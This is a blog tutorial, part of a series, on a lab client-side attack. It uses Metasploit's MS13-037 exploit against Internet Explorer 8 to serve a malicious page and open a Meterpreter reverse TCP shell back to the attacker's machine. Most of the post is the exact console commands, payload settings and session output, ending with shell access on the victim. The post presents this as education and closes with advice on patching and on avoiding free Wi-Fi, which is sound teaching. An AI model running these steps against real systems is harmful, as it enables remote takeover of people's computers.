Exploitation: Client-side Attack
This is part of a series of posts that walk through an attack. To start from the beginning, click here.
In the last post, we performed some basic reconnaissance on our target machine and determined its operating system, running services, and even what browser was used. In this part, we’ll set up a client-side attack and gain access to our target machine.
In recent times, client-side attacks have become a very popular way of attacking a machine. Client-side attacks differ from server-side attacks in that they require some kind of user interaction to successfully execute the exploit. Phishing, where the sender poses as a legitimate entity that the receiver trusts to entice them into clicking a malicious link or opening a malicious file, is an example of a client-side attack.
We’ll explore setting up a malicious website that hosts our client-side attack. This is easily accomplished with Kali using Metasploit. If you recall in our scenario, the target machine, Victim, has joined our “free wireless network” that we have full control over. This means we also have control over DNS and can redirect Victim to whichever site we please. This is important in setting up our client-side attack.
Metasploit: MS13-037
The Metasploit Framework (MSF) is an amazing collection of exploits and payloads wrapped in an easy to use command line interface. There exists a free community-driven version and a commercial paid version. We’ll be using the free version in Kali to set up our client-side attack.
Since we know that Victim is running Internet Explorer 8, a very old web browser, we’ll look for a client-side attack that can take advantage of this. After some research, we learn about MS13-037. This was a Microsoft cumulative security patch for Internet Explorer which addressed several vulnerabilities, including CVE-2013-2551. From the CVE database description, this is a “use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 [that] allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object.”
This sounds like something we can use. Let’s see if Metasploit has an available exploit. We prepare Metasploit for first use by following the instructions from the Kali website. Open a terminal window and type msfconsole to start up the Metasploit Framework console.
root@kali:~# msfconsole
[*] Starting the Metasploit Framework console...\
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM MMMMMMMMMM
MMMN$ vMMMM
MMMNl MMMMM MMMMM JMMMM
MMMNl MMMMMMMN NMMMMMMM JMMMM
MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMNM MMMMMMM MMMMM jMMMM
MMMNI WMMMM MMMMMMM MMMM# JMMMM
MMMMR ?MMNM MMMMM .dMMMM
MMMMNm `?MMM MMMM` dMMMMM
MMMMMMN ?MM MM? NMMMMMN
MMMMMMMMNe JMMMMMNMMM
MMMMMMMMMMNm, eMMMMMNMMNMM
MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
http://metasploit.pro
Payload caught by AV? Fly under the radar with Dynamic Payloads in
Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.10.0-2014102901 [core:4.10.0.pre.2014102901 api:1.0.0]]
+ -- --=[ 1369 exploits - 833 auxiliary - 233 post ]
+ -- --=[ 340 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf >
Now let’s search for an MS13-037 exploit by typing search ms13-037.
msf > search ms13-037
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/browser/ms13_037_svg_dashstyle 2013-03-06 normal MS13-037 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow
msf > We’re in luck, Metasploit has an available exploit. Type use exploit/windows/browser/ms13_037_svg_dashstyle to select the exploit and then type show options to view configurable options.
msf > use exploit/windows/browser/ms13_037_svg_dashstyle
msf exploit(ms13_037_svg_dashstyle) > show options
Module options (exploit/windows/browser/ms13_037_svg_dashstyle):
Name Current Setting Required Description
---- --------------- -------- -----------
OBFUSCATE false no Enable JavaScript obfuscation
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion TLS1 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms13_037_svg_dashstyle) > This particular Metasploit attack creates a website that will deliver a malicious payload and give us access to our target machine. The options shown above are specific to how we want to set up the malicious website. We’ll leave most of these as default but change SRVPORT to 80 (this is the local port on our Attacker machine we want to listen on) and URIPATH to clickme (this is the URI path to use for serving the exploit). To do this, we’ll type set SRVPORT 80 and set URIPATH clickme and then type show options to confirm the changes.
msf exploit(ms13_037_svg_dashstyle) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms13_037_svg_dashstyle) > set URIPATH clickme
URIPATH => clickme
msf exploit(ms13_037_svg_dashstyle) > show options
Module options (exploit/windows/browser/ms13_037_svg_dashstyle):
Name Current Setting Required Description
---- --------------- -------- -----------
OBFUSCATE false no Enable JavaScript obfuscation
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion TLS1 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH clickme no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 AutomaticNext, let’s configure the exploit target. It is currently set to Automatic, however, I’ve found that sometimes this doesn’t always work. Let’s see what targets are available by typing show targets and then configure a specific one for Metasploit to use by typing set target and the number of a specific option. We’ll again type show options to confirm our changes.
msf exploit(ms13_037_svg_dashstyle) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic
1 IE 8 on Windows 7 SP1 with JRE ROP
2 IE 8 on Windows 7 SP1 with ntdll.dll Info Leak
msf exploit(ms13_037_svg_dashstyle) > set target 2
target => 2
msf exploit(ms13_037_svg_dashstyle) > show options
Module options (exploit/windows/browser/ms13_037_svg_dashstyle):
Name Current Setting Required Description
---- --------------- -------- -----------
OBFUSCATE false no Enable JavaScript obfuscation
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion TLS1 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH clickme no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
2 IE 8 on Windows 7 SP1 with ntdll.dll Info Leak
msf exploit(ms13_037_svg_dashstyle) > We set target to 2 since target 1 is for Internet Explorer with a JRE (Java Runtime Environment), which we don’t have. So far so good, now let’s set up the malicious payload that will be delivered to the vulnerable client. Type show payloads to view a list of payloads that are compatible with this exploit.
msf exploit(ms13_037_svg_dashstyle) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
generic/tight_loop normal Generic x86 Tight Loop
windows/dllinject/bind_ipv6_tcp normal Reflective DLL Injection, Bind TCP Stager (IPv6)
windows/dllinject/bind_nonx_tcp normal Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
windows/dllinject/bind_tcp normal Reflective DLL Injection, Bind TCP Stager
windows/dllinject/bind_tcp_rc4 normal Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption)
windows/dllinject/reverse_hop_http normal Reflective DLL Injection, Reverse Hop HTTP Stager
windows/dllinject/reverse_http normal Reflective DLL Injection, Reverse HTTP Stager
windows/dllinject/reverse_ipv6_tcp normal Reflective DLL Injection, Reverse TCP Stager (IPv6)
windows/dllinject/reverse_nonx_tcp normal Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
windows/dllinject/reverse_ord_tcp normal Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
windows/dllinject/reverse_tcp normal Reflective DLL Injection, Reverse TCP Stager
windows/dllinject/reverse_tcp_allports normal Reflective DLL Injection, Reverse All-Port TCP Stager
windows/dllinject/reverse_tcp_dns normal Reflective DLL Injection, Reverse TCP Stager (DNS)
windows/dllinject/reverse_tcp_rc4 normal Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption)
windows/dllinject/reverse_tcp_rc4_dns normal Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS)
windows/dns_txt_query_exec normal DNS TXT Record Payload Download and Execution
windows/download_exec normal Windows Executable Download (http,https,ftp) and Execute
windows/exec normal Windows Execute Command
windows/loadlibrary normal Windows LoadLibrary Path
windows/messagebox normal Windows MessageBox
windows/meterpreter/bind_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
windows/meterpreter/bind_nonx_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/meterpreter/bind_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager
windows/meterpreter/bind_tcp_rc4 normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption)
windows/meterpreter/reverse_hop_http normal Windows Meterpreter (Reflective Injection), Reverse Hop HTTP Stager
windows/meterpreter/reverse_http normal Windows Meterpreter (Reflective Injection), Reverse HTTP Stager
windows/meterpreter/reverse_https normal Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
windows/meterpreter/reverse_https_proxy normal Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
windows/meterpreter/reverse_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
windows/meterpreter/reverse_nonx_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/meterpreter/reverse_ord_tcp normal Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/meterpreter/reverse_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager
windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
windows/meterpreter/reverse_tcp_dns normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
windows/meterpreter/reverse_tcp_rc4 normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption)
windows/meterpreter/reverse_tcp_rc4_dns normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS)
windows/metsvc_bind_tcp normal Windows Meterpreter Service, Bind TCP
windows/metsvc_reverse_tcp normal Windows Meterpreter Service, Reverse TCP Inline
windows/patchupdllinject/bind_ipv6_tcp normal Windows Inject DLL, Bind TCP Stager (IPv6)
windows/patchupdllinject/bind_nonx_tcp normal Windows Inject DLL, Bind TCP Stager (No NX or Win7)
windows/patchupdllinject/bind_tcp normal Windows Inject DLL, Bind TCP Stager
windows/patchupdllinject/bind_tcp_rc4 normal Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption)
windows/patchupdllinject/reverse_ipv6_tcp normal Windows Inject DLL, Reverse TCP Stager (IPv6)
windows/patchupdllinject/reverse_nonx_tcp normal Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_ord_tcp normal Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_tcp normal Windows Inject DLL, Reverse TCP Stager
windows/patchupdllinject/reverse_tcp_allports normal Windows Inject DLL, Reverse All-Port TCP Stager
windows/patchupdllinject/reverse_tcp_dns normal Windows Inject DLL, Reverse TCP Stager (DNS)
windows/patchupdllinject/reverse_tcp_rc4 normal Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption)
windows/patchupdllinject/reverse_tcp_rc4_dns normal Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS)
windows/patchupmeterpreter/bind_ipv6_tcp normal Windows Meterpreter (skape/jt Injection), Bind TCP Stager (IPv6)
windows/patchupmeterpreter/bind_nonx_tcp normal Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
windows/patchupmeterpreter/bind_tcp normal Windows Meterpreter (skape/jt Injection), Bind TCP Stager
windows/patchupmeterpreter/bind_tcp_rc4 normal Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption)
windows/patchupmeterpreter/reverse_ipv6_tcp normal Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)
windows/patchupmeterpreter/reverse_nonx_tcp normal Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_ord_tcp normal Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_tcp normal Windows Meterpreter (skape/jt Injection), Reverse TCP Stager
windows/patchupmeterpreter/reverse_tcp_allports normal Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
windows/patchupmeterpreter/reverse_tcp_dns normal Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)
windows/patchupmeterpreter/reverse_tcp_rc4 normal Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption)
windows/patchupmeterpreter/reverse_tcp_rc4_dns normal Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS)
windows/shell/bind_ipv6_tcp normal Windows Command Shell, Bind TCP Stager (IPv6)
windows/shell/bind_nonx_tcp normal Windows Command Shell, Bind TCP Stager (No NX or Win7)
windows/shell/bind_tcp normal Windows Command Shell, Bind TCP Stager
windows/shell/bind_tcp_rc4 normal Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption)
windows/shell/reverse_hop_http normal Windows Command Shell, Reverse Hop HTTP Stager
windows/shell/reverse_http normal Windows Command Shell, Reverse HTTP Stager
windows/shell/reverse_ipv6_tcp normal Windows Command Shell, Reverse TCP Stager (IPv6)
windows/shell/reverse_nonx_tcp normal Windows Command Shell, Reverse TCP Stager (No NX or Win7)
windows/shell/reverse_ord_tcp normal Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP Stager
windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse All-Port TCP Stager
windows/shell/reverse_tcp_dns normal Windows Command Shell, Reverse TCP Stager (DNS)
windows/shell/reverse_tcp_rc4 normal Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption)
windows/shell/reverse_tcp_rc4_dns normal Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS)
windows/shell_bind_tcp normal Windows Command Shell, Bind TCP Inline
windows/shell_bind_tcp_xpfw normal Windows Disable Windows ICF, Command Shell, Bind TCP Inline
windows/shell_hidden_bind_tcp normal Windows Command Shell, Hidden Bind TCP Inline
windows/shell_reverse_tcp normal Windows Command Shell, Reverse TCP Inline
windows/speak_pwned normal Windows Speech API - Say "You Got Pwned!"
windows/upexec/bind_ipv6_tcp normal Windows Upload/Execute, Bind TCP Stager (IPv6)
windows/upexec/bind_nonx_tcp normal Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
windows/upexec/bind_tcp normal Windows Upload/Execute, Bind TCP Stager
windows/upexec/bind_tcp_rc4 normal Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption)
windows/upexec/reverse_hop_http normal Windows Upload/Execute, Reverse Hop HTTP Stager
windows/upexec/reverse_http normal Windows Upload/Execute, Reverse HTTP Stager
windows/upexec/reverse_ipv6_tcp normal Windows Upload/Execute, Reverse TCP Stager (IPv6)
windows/upexec/reverse_nonx_tcp normal Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
windows/upexec/reverse_ord_tcp normal Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
windows/upexec/reverse_tcp normal Windows Upload/Execute, Reverse TCP Stager
windows/upexec/reverse_tcp_allports normal Windows Upload/Execute, Reverse All-Port TCP Stager
windows/upexec/reverse_tcp_dns normal Windows Upload/Execute, Reverse TCP Stager (DNS)
windows/upexec/reverse_tcp_rc4 normal Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption)
windows/upexec/reverse_tcp_rc4_dns normal Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS)
windows/vncinject/bind_ipv6_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
windows/vncinject/bind_nonx_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/vncinject/bind_tcp normal VNC Server (Reflective Injection), Bind TCP Stager
windows/vncinject/bind_tcp_rc4 normal VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption)
windows/vncinject/reverse_hop_http normal VNC Server (Reflective Injection), Reverse Hop HTTP Stager
windows/vncinject/reverse_http normal VNC Server (Reflective Injection), Reverse HTTP Stager
windows/vncinject/reverse_ipv6_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_nonx_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/vncinject/reverse_ord_tcp normal VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager
windows/vncinject/reverse_tcp_allports normal VNC Server (Reflective Injection), Reverse All-Port TCP Stager
windows/vncinject/reverse_tcp_dns normal VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
windows/vncinject/reverse_tcp_rc4 normal VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption)
windows/vncinject/reverse_tcp_rc4_dns normal VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS)
msf exploit(ms13_037_svg_dashstyle) >
Wow, so many options! My personal favorite has always been the Windows Meterpreter (Reflective Injection), Reverse TCP Stager. Meterpreter is an amazing payload that provides a whole host of options. From the Metasploit Unleashed tutorial:
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
I like the Reverse TCP Stager because this will open a Meterpreter session on Victim that is then sent directly back to us. Because Victim is making the outbound connection to our Attacker machine and because most firewalls don’t block outbound connections by default, our newly created Meterpreter session will be sent back to us without being blocked by Victim’s firewall. This is as opposed to the Bind TCP Stager which would also open a Meterpreter session on the Victim, but it would not send this session directly back to us. Instead, the Meterpreter session on Victim would be configured to listen for connections from our Attacker. Meaning, we’d have to make an outbound connection directly from our Attacker machine to Victim’s listening Meterpreter session. Since most firewalls deny all by default, this connection would likely be blocked by Victim’s firewall.
All that said, let’s go ahead and use this payload by typing set payload windows/meterpreter/reverse_tcp. Then type show options to see what payload options are configurable.
msf exploit(ms13_037_svg_dashstyle) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms13_037_svg_dashstyle) > show options
Module options (exploit/windows/browser/ms13_037_svg_dashstyle):
Name Current Setting Required Description
---- --------------- -------- -----------
OBFUSCATE false no Enable JavaScript obfuscation
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion TLS1 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH clickme no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 IE 8 on Windows 7 SP1 with ntdll.dll Info Leak
msf exploit(ms13_037_svg_dashstyle) > We’ll just configure LHOST which is the listening IP address for the payload. Since we want the Meterpreter session to be sent back to our Attacker machine, we’ll set LHOST to 10.0.1.10 by typing set LHOST 10.0.1.10. Again, we’ll type show options to review our changes one last time before executing the exploit.
msf exploit(ms13_037_svg_dashstyle) > set LHOST 10.0.1.10
LHOST => 10.0.1.10
msf exploit(ms13_037_svg_dashstyle) > show options
Module options (exploit/windows/browser/ms13_037_svg_dashstyle):
Name Current Setting Required Description
---- --------------- -------- -----------
OBFUSCATE false no Enable JavaScript obfuscation
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion TLS1 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH clickme no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)
LHOST 10.0.1.10 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 IE 8 on Windows 7 SP1 with ntdll.dll Info Leak
msf exploit(ms13_037_svg_dashstyle) > Looks like everything’s configured just the way we wanted. Let’s create the malicious website and serve the payload by typing exploit.
msf exploit(ms13_037_svg_dashstyle) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 10.0.1.10:4444
[*] Using URL: http://0.0.0.0:80/clickme
[*] Local IP: http://10.0.1.10:80/clickme
[*] Server started.
msf exploit(ms13_037_svg_dashstyle) > Now on our Victim machine, we’ll visit the URL created, http://10.0.1.10/clickme, and see what happens.
From the screenshot above, we can see that Victim was redirected to another URL and the screen appears blank as if it’s trying to load something. Eventually, Internet Explorer crashes.
So what happened? Did our exploit fail? Let’s check our Metasploit console.
msf exploit(ms13_037_svg_dashstyle) >
[*] 10.0.1.11 ms13_037_svg_dashstyle - Requesting: /clickme
[*] 10.0.1.11 ms13_037_svg_dashstyle - Sending HTML to info leak...
[*] 10.0.1.11 ms13_037_svg_dashstyle - Requesting: /clickme/XssWuvigzg?RvtqQ=1996386480
[*] 10.0.1.11 ms13_037_svg_dashstyle - Using ntdll ROP
[*] 10.0.1.11 ms13_037_svg_dashstyle - Sending HTML to trigger...
[*] Sending stage (770048 bytes) to 10.0.1.11
[*] Meterpreter session 1 opened (10.0.1.10:4444 -> 10.0.1.11:49328) at 2014-11-11 20:22:21 -0600
[*] Session ID 1 (10.0.1.10:4444 -> 10.0.1.11:49328) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3852)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1828
[+] Successfully migrated to process
This looks promising! The Metasploit output above is a log of what actions occurred when Victim browsed to our malicious website. Immediately after the Meterpreter session was created, it opened a Notepad process in the background (the user can’t see it) and then migrated itself to this Notepad process. The reason being that once Internet Explorer crashes and is closed, the Meterpreter session dies. Often times, an exploit will cause the target application to crash or close unexpectedly. If the Meterpreter session is running as that process, it will then die along with it.
A quick look at the Windows Task Manager confirms that Notepad is running in the background with the PID of 1828 as noted in the Metasploit output. We can also see the process is running as user eric.
Back in Metasploit, let’s view our open Meterpreter sessions by typing sessions.
msf exploit(ms13_037_svg_dashstyle) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 WIN-FDN9DNVQ5IR\eric @ WIN-FDN9DNVQ5IR 10.0.1.10:4444 -> 10.0.1.11:49328 (10.0.1.11)
Now let’s interact with the session by typing sessions -i 1.
msf exploit(ms13_037_svg_dashstyle) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
As proof that we are in fact remotely connected to Victim, we can type shell to open a Windows command prompt (cmd.exe) and then type ipconfig to verify the IP address of Victim. We can see the IP address is 10.0.1.11. We can also type hostname to confirm that this is the same hostname we saw in our reconnaissance phase.
meterpreter > shell
Process 2936 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\eric\Desktop>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Bluetooth Network Connection:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::a0dd:5cb7:b23d:af11%11
IPv4 Address. . . . . . . . . . . : 10.0.1.11
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.0.1.1
Tunnel adapter isatap.austin.rr.com:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Tunnel adapter Local Area Connection* 13:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : 2001:0:5ef5:79fd:3cfe:11c4:f5ff:fef4
Link-local IPv6 Address . . . . . : fe80::3cfe:11c4:f5ff:fef4%13
Default Gateway . . . . . . . . . : ::
Tunnel adapter isatap.{6657C62C-5DA5-4E0B-9C4A-2786A3F83F20}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:\Users\eric\Desktop>hostname
hostname
WIN-FDN9DNVQ5IR
So what have we accomplished so far? We set up a client-side exploit by using Metasploit to craft a malicious website that exploited a vulnerability in an old version of Internet Explorer 8. The exploit then loaded a malicious payload that opened a Meterpreter session for us that we used to remotely access Victim. Pretty cool, huh?
Hopefully, this will make you think twice about joining “free Wi-Fi” or clicking on suspicious links. This should also encourage you to keep your software up to date, especially your internet browser.
What’s Next
So far, we’ve seen how easy it is to exploit vulnerabilities and affirmed the importance of maintaining updated software. In the final part of this series, we’ll further explore Meterpreter and its capabilities including privilege escalation, data exfiltration, and maintaining persistence.
